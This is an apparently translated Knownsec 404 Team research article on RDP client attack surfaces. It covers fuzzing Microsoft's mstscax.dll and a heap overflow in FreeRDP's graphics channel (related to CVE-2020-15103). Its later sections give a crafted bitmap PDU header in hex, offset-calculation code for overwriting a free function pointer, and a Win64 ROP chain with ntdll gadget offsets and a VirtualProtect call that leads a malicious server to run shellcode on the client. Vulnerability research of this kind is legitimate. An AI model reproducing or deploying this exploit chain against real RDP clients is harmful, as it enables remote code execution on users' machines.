Author:sunglin@Knownsec 404 Team
Date: November 9, 2021
Chinese Version: https://paper.seebug.org/1734/

0x00 Application of RDP protocol

RDP (Remote Desktop Protocol) is a proprietary protocol created by Microsoft. It allows system users to connect to remote systems through graphical interfaces. RDP is mainly divided into server and client.

In this article we will talk about applications related to client and the attack surface.

The main popular apps include:

mstsc.exe(Microsoft system)

freerdp (The most popular and mature open source app, with github star over 5.6K, fork close to 10K)

0x01 RDP communication mechanism

  1. [MS-RDPBCGR] is based on the ITU (International Telecommunication Union) T.120 series protocol. The T.120 standard consists of a set of communications and application layer protocols that enable implementors to create compatible products and services for real-time, multipoint data connectivity and conferencing.

  2. [MS-RdpBCGR] protocol can establish a tunnel for transmission through static virtual channel and dynamic extended protocol;

  3. there are 9 protocols can establish static virtual channel, including commonly-used clipboard、audio output、print virtual channel、smart card, etc.

  4. 12 of these protocols can tunnel with dynamic channel virtual channel extension [MS-RDPEDYC], including video virtual channel, audio input, USB devices, graphics pipes, plug and play devices, etc.

  5. 7 protocols extend [MS-rdpbcgr] and include UDP transport extension [MS-RDPEUDP], gateway server protocol [MS-TSgu], etc.

image-20211009145542821

0x02 RDP image processing channel attack surface

RDP protocol has two channels and a variety of ways for image processing, the protocol is also very complex.

image-20211009145632231

0x03 Attack the MSRDP graphics processing channel

attack fastpath 
api:
CCO::OnFastPathOutputReceived(CCO *this, unsigned __int8 *a2, unsigned int a3)
{
switch()
{
case1:
CTSCoreGraphics::ProcessBitmap
.............
case 9:
CCM::CM_ColorPointerPDU
case A:
case B:
............
}
}

Fuzzing this channel, and then get the CRASH of MSRDP:

image-20211009145808037

image-20211009145812444

0x04 Briefly analyze this vulnerability

The vulnerability exists in the module mSTscax.dll, whose API is CUH::UHLoadBitmapBits CUH::UHGetMemBltBits accesses an array boundary when retrieving stored bitmap data

image-20211009145849700

0x05 Vulnerability similarity analysis

MSRDP has the same vulnerability as FreerDP?

freerdp CVE-2020-11525

Like the same vulvulnerability: If id == maxcells, the bitmap array will be out of bounds. Freerdp is the same as msrdp.

image-20211009145918797

0x06 Path and mode of reverse attack on the client

image-20211009145950721

0x07 Background of vulnerability

As for the vulnerability of RDP graphics channel, I reported a vulnerability to FreerDP in July, and FreerDP replied to me and assigned the CVE number CVE-2020-15103. The reason of the vulnerability mentioned at that time was integer overflow, and FreerDP released version 2.2.0 to fix the vulnerability I mentioned. After further analysis of this vulnerability, it was found that it was not just integer overflow, but freerDP did not fix this vulnerability correctly, so it was further analyzed.

0x08 Vulnerability analysis

First of all, when the RDP connection is established, the server sends the Demand Active PDU protocol field to the client for function exchange, the stage of the connection process can be seen from the following figure.

image-20211009150028968

The code for freerdp processing is processed in the connection part of the callback function rdp_recv_callback, When RDP ->state is CONNECTION_STATE_CAPABILITIES_EXCHANGE,the Demand Active PDU protocol fields will be received.Further, the Demand Active PDU protocol fields will use capabilitySets fields to set each function.

capabilitySets (variable): An array of Capability Set (section 2.2.1.13.1.1.1) structures. The number of capability sets is specified by the numberCapabilities field

Here we focus on Bitmap Capability Set.

image-20211009150038797

The Bitmap Capability Set looks like this, it sets the desktopWidth and desktopHeight fields which will be used to create the window session, and allocates a chunk of memory through these fields, and the memory area will be the area that causes the following overbounds.

image-20211009150047849

The API call path in Freerdp is as follows:

rdp_recv_callback->rdp_client_connect_demand_active->rdp_recv_demand_active->rdp_read_capability_sets->rdp_read_bitmap_capability_set

The rdp_read_bitmap_capability_set function will receive the server data and will set desktopWidth and desktopHeight.

https://github.com/FreeRDP/FreeRDP/blob/libfreerdp/core/capabilities.c

image-20211009150059661

Freerdp will perform a series of initializations in wF_POST_connect, including initializing bitmap. The API call path is as follows:

wf_post_connect->wf_image_new->wf_create_dib->CreateDIBSection

The final will be calling Windows API CreateDIBSection, CreateDIBSection will create a large memory base of 4096 pages using bmi. Bmiheader.biwidth * bmi. Bmiheader.biheight * bmi. Bmiheader.bibitcount.

https://github.com/FreeRDP/FreeRDP/blob/client/Windows/wf_graphics.c

image-20211009150110379

After freeRDP is set up and initialized, the memory is called and the vulnerability is triggered to send Bitmap Data through fast-path Data. Then FreeRDP will use the initialized memory without any restrictions

image-20211009150122177

The sent data header is as follows:

00,

0x84,0x24,//size = 1060

0x04,

0x1e,0x4, //size - 6 

0x04, 0x00,//cmdType

0x00, 0x00,//marker.frameAction

0xFF, 0xE3, 0x77, 0x04,//marker.frameId

0x01, 0x00,//cmdType

0x00, 0x00, //cmd.destLeft  //  nXDst * 4 

0x00, 0x00, //cmd.destTop  //  nYDst * width

0x00, 0x03,//cmd.destRight

0x04, 0x04,//cmd.destBottom

0x20, //bmp->bpp

0x80,//bmp->flags

0x00,//reserved

0x00, //bmp->codecID

0x00, 0x01, //bmp->width *4

0x01, 0x0, //bmp->height

0x00 ,4,0,0,//bmp->bitmapDataLength

With the specially made header data, the following path will be obtained:

rdp_recv_pdu->rdp_recv_fastpath_pdu->fastpath_recv_updates->fastpath_recv_update_data->fastpath_recv_update->update_recv_surfcmds->update_recv_surfcmd_surface_bits->gdi_surface_bits->freerdp_image_copy

Let's start with the function gdi_surface_bits,in which, there are three paths to parse and process the received data. Case RDP_CODEC_ID_REMOTEFX and case RDP_CODEC_ID_NSCODEC,Both paths parse and transform the raw data, whereas in case RDP_CODEC_ID_NONE, you get the opportunity to copy the raw data directly.

Static BOOL gdi_surface_bits(rdpContext* context, const SURFACE_BITS_COMMAND* cmd)

{

switch(cmd->bmp.codecID)

{

    case RDP_CODEC_ID_REMOTEFX:

        rfx_process_message();

    case RDP_CODEC_ID_NSCODEC:

        nsc_process_message();

    case RDP_CODEC_ID_NONE:

        freerdp_image_copy()



}

}

Finally come to data cross function freerdp_image_copy (),where variables copyDstWidth, nYDst, nDstStep, xDstOffset are controllable, memcpy will be written out of bounds

image-20211009150151366

There's a problem. The CreateDIBSection allocates 4096 pages of memory that is not in the freerdp process.It's hard to overwrite freerDP memory even if you write out of bounds. Setting desktopWidth or desktopHeight to 0 will cause the CreateDIBSection to fail to allocate memory, which causes another path gdi_CreateCompatibleBitmap in gdi_init_primary, where_aligned_malloc is called to allocate memory symmetrically with 16 bytes. DesktopWidth or desktopHeight is set to 0, so 16 bytes of stable memory will be allocated, which is in the FreerDP process.

image-20211009150200592

0x09 If say you can obtain information leakage

If it is possible to leak the heap address using a homebrew tool, for example, start from the simplest one, by leaking the address of out-of-bounds memory, the structure is called in gdi_CreateCompatibleBitmap and allocates the memory that will be out-of-bounds

If you look at the following structure, you will see that the data pointer will be followed by a free function pointer, which leaks two addresses, the address of the GDI_BITMAP structure and the address of the data pointer, as long as the address of the GDI_BITMAP structure is higher than the address of the data pointer,the offset can be calculated. By setting the offset, it can accurately overwrite free. Finally, it can control RIP by actively calling free.

image-20211009150208614

0x10 Accurate calculation of offset

Let me remind you a little bit NYDst is CMD ->destTop,nDstStep is CMD ->bmp.width *4, xDstOffset is cmd.destLeft*4, and copyDstWidth is CMD ->bmp.width *4

BYTE* dstLine = &pDstData[(y + nYDst) * nDstStep * dstVMultiplier + dstVOffset];

memcpy(&dstLine[xDstOffset], &srcLine[xSrcOffset], copyDstWidth);

Here offset = gdiBitmap_addr - Bitmapdata_addr;

It is needed to set nYDst * nDstStep *1 + xDstOffset = offset

The data sent to BitmapData includes shellCode with a size of 1060 and a header size of 36

The shellCode layout is as follows:

image-20211009150217611

The final calculation is as follows:

if (gdi_addr > Bitmapdata_addr)

{

    eip_offset = gdi_addr - Bitmapdata_addr;

    char okdata = eip_offset % 4;

    UINT64 copywidth = 1024 * 0xffff;

    if (okdata == 0)

    {

        if (eip_offset < copywidth)

        {

            eip_offset = eip_offset - 1016 + 32  + 32 + 64; //Go backwards 32 + 64

            eip_y = eip_offset % 1024;

            eip_ = (eip_offset - eip_y) / 1024;

            nXDst = eip_y / 4;

        }

    }

}

0x11 Call free actively

Sending the above bitmap_data data will control hBitmap->free, sending theRDPGFX_RESET_GRAPHICS_PDU message will reset, and hBitmap->free will be called first to release initialized resources.

image-20211009150229058

RDPGFX_RESET_GRAPHICS_PDU message processing API flows as follows:

rdpgfx_on_data_received->rdpgfx_recv_pdu->rdpgfx_recv_reset_graphics_pdu->gdi_ResetGraphics->wf_desktop_resize->gdi_resize_ex->gdi_bitmap_free_ex

image-20211009150236339

Rip is controlled by calling hBitmap-> FREE (hBitmap->data)

0x12 Construct rop chains on top of Win64

First of all, the condition of ROP chain is that the data on the stack must be used by POP RET, so the complete ROP chain can be constructed only by controlling the data on the stack. Here we observe the register value when calling free:

Rax = hBitmap->data rcx = hBitmap->data rdi = rsp + 0x40

The heap data above the address of tmap->data is the data controlled. Here, under the premise of ignoring the randomization of base address, such a slider is found through ROPgadget in NTDLL:

48 8B 51 50               mov   rdx, [rcx+50h]

48 8B 69 18               mov   rbp, [rcx+18h]

48 8B 61 10               mov   rsp, [rcx+10h]

FF E2                     jmp   rdx

As long as this ROP chain is executed, RSP can be perfectly controlled. Then, it only needs to call WIN API to obtain the memory of a piece of executable code. Here, the simplest way is to directly call VirtProtect to rewrite the memory page of ShellCode to the executable state. On x86_64, all API calls are passed through registers. Virtprotect passes the following parameters:

Mov r9d,arg4

Mov r8d,arg3

Mov edx,arg2

Mov ecx,arg1

Call virtprotect

To sum up, my ROP chain code is constructed like this:

UINT64 rop1 = 0x00000000000A2C08; //mov rdx, [rcx+50h], mov  rbp, [rcx+18h],mov rsp,    [rcx+10h],jmp rdx

UINT64 rop2 = 0x00008c4b4;    // ntdll pop r9 pop r10 pop r11 ret

UINT64 rop3 = 0x8c4b2;      //ntdll pop r8 ; pop r9 ; pop r10 ; pop r11 ; ret

UINT64 rop4 = 0xb416;      //ntdll pop rsp ret

UINT64 rop5 = 0x8c4b7;     //ntdll pop rdx; pop r11; ret

UINT64 rop6 = 0x21597;    //ntdll pop rcx; ret

UINT64 rop7 = 0x64CC0;    //virtprotect

UINT64 shellcode_addr = ntdll_Base_Addr + rop1;

UINT64 rsp_godget = gdi_addr - 104;

memcpy(&shellcode[956], &shellcode_addr, sizeof(shellcode_addr));//向后退32 + 64 rop   之rsp控制栈

memcpy(&shellcode[948], &gdi_addr, sizeof(gdi_addr));      //控制rcx

memcpy(&shellcode[940], &rsp_godget, sizeof(rsp_godget));   //rsp赋值

shellcode_addr = ntdll_Base_Addr + rop3;

memcpy(&shellcode[1004], &shellcode_addr, sizeof(shellcode_addr));//jmp rdx赋值,rop   开始执行

shellcode_addr = ntdll_Base_Addr + rop5;       //rop 栈赋值rdx

UINT64 ret1 = 924 - 72;

memcpy(&shellcode[ret1], &shellcode_addr, sizeof(shellcode_addr));

shellcode_addr = ntdll_Base_Addr + rop6;   //rop re2

UINT64 ret2 = 924 - 48;

memcpy(&shellcode[ret2], &shellcode_addr, sizeof(shellcode_addr));

shellcode_addr = KERNEL32Base_Addr + rop7;  //rop re3

UINT64 ret3 = 924 - 32;

memcpy(&shellcode[ret3], &shellcode_addr, sizeof(shellcode_addr));

UINT64 virtprotect_arg4 = 924 - 96;

shellcode_addr = gdi_addr - 112;      //rop virtprotect_arg4

memcpy(&shellcode[virtprotect_arg4], &shellcode_addr, sizeof(shellcode_addr));

UINT64 virtprotect_arg1 = 924 - 40;

shellcode_addr = gdi_addr - 888;    //rop virtprotect_arg4

memcpy(&shellcode[virtprotect_arg1], &shellcode_addr, sizeof(shellcode_addr));

memcpy(&shellcode[900], &shellcode_addr, sizeof(shellcode_addr)); //ret to shellcode

respose_to_rdp_client(shellcode, 1060);//attack heap overflow

From the ROP chain to shellcode execution, the value of register RDI is not overwritten, so when shellcode is executed, the stack address can be restored through RDI. This is the simplest way:

Mov rsp,rdi

Finally, shellcode is executed.

For sharing only, do not use in other ways.


Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1754/